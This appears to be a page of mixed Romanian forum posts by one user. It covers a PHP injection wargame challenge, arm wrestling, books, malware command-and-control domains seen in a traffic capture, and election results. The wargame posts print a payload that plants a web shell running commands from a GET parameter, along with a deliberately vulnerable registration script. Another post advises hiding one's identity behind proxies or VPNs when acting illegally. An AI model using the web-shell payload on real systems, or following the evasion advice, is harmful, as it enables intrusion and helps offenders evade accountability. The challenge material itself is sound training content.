SirGod

Aici: http://www.warez-bb.org O sa gasesti acolo, eu am gasit.

Eh, merge si asa, dar merge si decat cu injectare o singura data, ceva de genu: User: ../ Pass: "?><?php $code = "evil.php"; $handler = fopen($code, 'w') or die("cant open file"); $evil = "<?php system(\$_GET['cmd']); ?>"; fwrite($handler, $evil); fclose($handler); ?> Apoi accesam _data.php si ni se creeaza fisierul.

@loki: Gresit. Iti va creea fisierul in folderul users, pe care nu il poti accesa pentru ca ai .htaccess, deci nu ai ce face cu el. @pax: Ai prins ideea, dar vezi ca ce injectezi tu nu merge. O sa iti dea o eroare cand accesezi fisierul: Parse error: parse error, expecting `T_STRING' or `T_VARIABLE' or `T_NUM_STRING' in C:\wamp\www\wargames\pax_data.php on line 1 Trebuie sa fi atent ce cod injectezi. Modul in care salvez datele de inregistrare l-am facut ca sa fie putin mai dificil. Si nu poti accesa /users/ , ai acces web nu consola, nu inteleg ce vrei sa arati cu alea. Sa explic pe scurt: Nu aveti acces la site decat prin WWW. Nu aveti consola. Nu puteti face NIMIC ca sa accesati folderul users pentru ca nu puteti trece peste htaccess. Si inca ceva, de care nu ati tinut cont. Am zis sa creati un fisier cu numele vostru nu numelevostru_data.php . Nu e mare branza, doar o mica schimbare de cod care trebuie injectat.

Fisiere pe server: index.php. Foldere pe server: /users. .htaccess din /users Codul din index.php <?php error_reporting(0); if(isset($_POST['submit'])) { $name=$_POST['name']; $record = 'users/'.$name.'_data.php'; $fh = fopen($record, 'w') or die("Can not open file!"); $tag='<?php "'; fwrite($fh, $tag); $reguser = 'Username = ' .$_POST['name']; fwrite($fh, $reguser); $reguser2 = 'Password = ' .$_POST['password']; fwrite($fh, $reguser2); $tag2='" ?>'; fwrite($fh, $tag2); fclose($fh); echo 'Registered'; } else { echo '<html>'. '<form method="POST" action=""> '. '<input type="text" name="name">'. '<input type="password" name="password">'. '<input type="submit" name="submit" value="submit">'. '</form>'. '</html>'; } ?> In folderul users avem htaccess (deny from all) deci nu il putem accesa sa ii vedem continutul si nici fisierele nu putem sa le accesam. Ce trebuie sa faceti: In directorul root, in acelasi loc cu index.php, plasati cumva un fisier cu numele vostru care sa va poata permite executarea de comenzi preluate dintr-o variabila preluata prin $_GET.

Era sa-l puna? Nu s-a vazut destul de clar cum s-a jucat cu el? Si, N-W-A, skandenbergul epuizeaza, ca orice alt sport. Incearca pe propria piele daca nu crezi.

Dupa cum probabil ati vazut sau ati auzit Oncescu a invins 300 de oameni la rand intr-un maraton de skandenberg. Mai multe detalii(si video) aici: http://www.kombat.ro/skandenberg/iron-oncescu-a-spulberat-armata-lui-valahidas-a-invins-300-de-oameni.html Eu unul nu credeam ca va reusi, dar se pare ca a facut-o. Si participantii nu au fost chiar de 50kg, printre ei aflandu-se si campioni nationali si profesionisti, majoritatea participantilor fiind bine facuti. Sunt mandru de Ion Oncescu, sunt mandru ca sunt roman ca si el. Romania ar trebuii sa se mandreasca cu el, un cvadruplu campion mondial de skandenberg e o realizare(campion mondial la amandoua mainile). El al trebui sa fie laudat si platit pe masura nu astia de la fotbal care sunt platiti cu zeci de mii de euro ca au ajuns in niste amarate de grupe UEFA. Ma gandesc ce s-ar intampla daca ar castiga un campionat mondial vreo echipa de fotbal, le-ar da jumatate de tara, pe cand campionului mondial la skandenberg nu cred ca i-au aruncat zeci de mii de euro in conturi si nici nu l-au ridicat in slavi.Felicitari Oncescu, suntem mandri de tine. Acum vreau sa aud si parerile voastre.

Nici o problema. Oricum nu te astepta la mari descoperiri, cartea a aparut in 1998. Dar e captivanta.

Am mai adaugat o carte la lista celor citite. Si anume, Fortareata Digitala. O recomand tuturor, in special impatimitilor de criptografie.

Foloseste Wireshark.

Te enervezi? Vrei sa zici ca te tine cu sufletu la gura la cu pagina care trece. Acuma depinde si de gusturile omului. Cartile lui sunt de genu, cum imi place mie sa le numesc, "inca un capitol si gata pe astazi".

Am mai citit: - Codul lui DaVinci de Dan Brown - Cartea iluziilor de Paul Auster - Miezul noptii in gradina binelui si a raului de John Berendt Si mai am de citit ~50 de pagini din cele ~550 a cartii Ingeri si demoni de Dan Brown. Cartile lui Dan Brown sunt geniale, le recomand.

http://www.220.ro/oB752TCfwt/Oameni-Nebuni Penal. http://www.220.ro/Rm49W4betO/Povestea-Incredibila-A-Unui-Amant

Din cate am vazut, plictiseala asta face o gramada de victime. Site-urile iau deface din cauza plictiselii. Vulnerabilitati sunt gasite,exploatate si publicate din cauza plictiselii. Maine o sa dam in cap la vecinu' din cauza plictiselii. Se raspandeste mai rau decat gripa porcina. Toata lumea face ceva "rau" din plictiseala, plictiseala e cauza tuturor relelor de pe pamant din cate vad. Cred ca Osama Bin Laden a dat in turnuri din plictiseala. Voi nu credeti asta? Voi ce faceti de plictiseala? PS: Am facut topicul din plictiseala. Raspundeti si voi, doar e plictiseala si nu aveti ce face. Apropo, cine se simte e treaba lui, nu ma intereseaza.

Oare ce o cauta Internet Explorer pe site-ul celor de la Microsoft?

Si inainte de Revelion daca faceai asa iti aparea countdown (in secunde) din timpul ramas pana la revelion.

Da,si eu ascult muzica si ma uit la filme cu PC-ul inchis.

M-am uitat prin .pcap-ul de la anubis sa vad traficul facut.Are IP dinamic.Si foloseste zapto.org. C:\Documents and Settings\SirGod>ping 3728.zapto.org Pinging 3728.zapto.org [188.27.212.206] with 32 bytes of data: Request timed out. Si mai are si pe no-ip.com.Aici e IP de US. C:\Documents and Settings\SirGod>ping nf1.no-ip.com Pinging nf1.no-ip.com [204.16.252.8] with 32 bytes of data: Request timed out. Daca cineva e dispus sa il testeze si sa captureze traficul facut,poate si posteaza fisierul pcap.

Parola este "D".Doar nu credeati ca o sa pun un cuvant sau alte chestii.

Tot ce faci trece prin ISP.Ascundeti indentitatea(proxy,socks,vpn) cand faci anumite actiuni ilegale si atunci cei de la RDS nu mai primesc reclamatii ca tu ai facut ceva.Cei care reclama vor lua legatura cu providerii IP-urilor corespunzatoare(cele care le-ai folosit pentru a te ascunde).

Are legatura cu tastatura unui telefon?

Eu am vazut filmul "Sfera" dupa ce am citit cartea.Slab de tot,multe chestii schimbate si OMISE.Foarte multe.Maine cred ca o sa dau o raita pe la biblioteca si prin librarii sa vad ce imi face cu ochiu'.Cred ca o sa incerc si "Perfume".

Dupa cativa ani de pauza de la citit carti mi-a venit din nou cheful.Ce am citit in ultimul timp si ce va recomand sa cititi : Ultima mutare a regelui de Ronan Bennett Cadaverosimil de Toby Litt Sfera de Michael Crichton De veghe in lanul de secara de J.D. Salinger Orasul infernului de Edward Lee Cartea fara nume Autor anonim (da,aia de se zice ca daca o citesti mori,eu sunt mai viu ca oricand) Voi ce cititi?Ce imi recomandati?Ceva SF,Mystery,Thriller. PS:Am vazut topicul "Ce mai cititi" postat mai demult,dar nu mi s-a parut chiar in tema.

Hacker scalps NASA-run websites Lol,idiots.

http://www.bec2009p.ro/Documente%20PDF/Rezultate/Rezultate%20partiale%20turul%20II/partiale%20ora13.pdf

Rezultate ora 14:00 Traian Basescu 50,33% Mircea Geoana 49,66%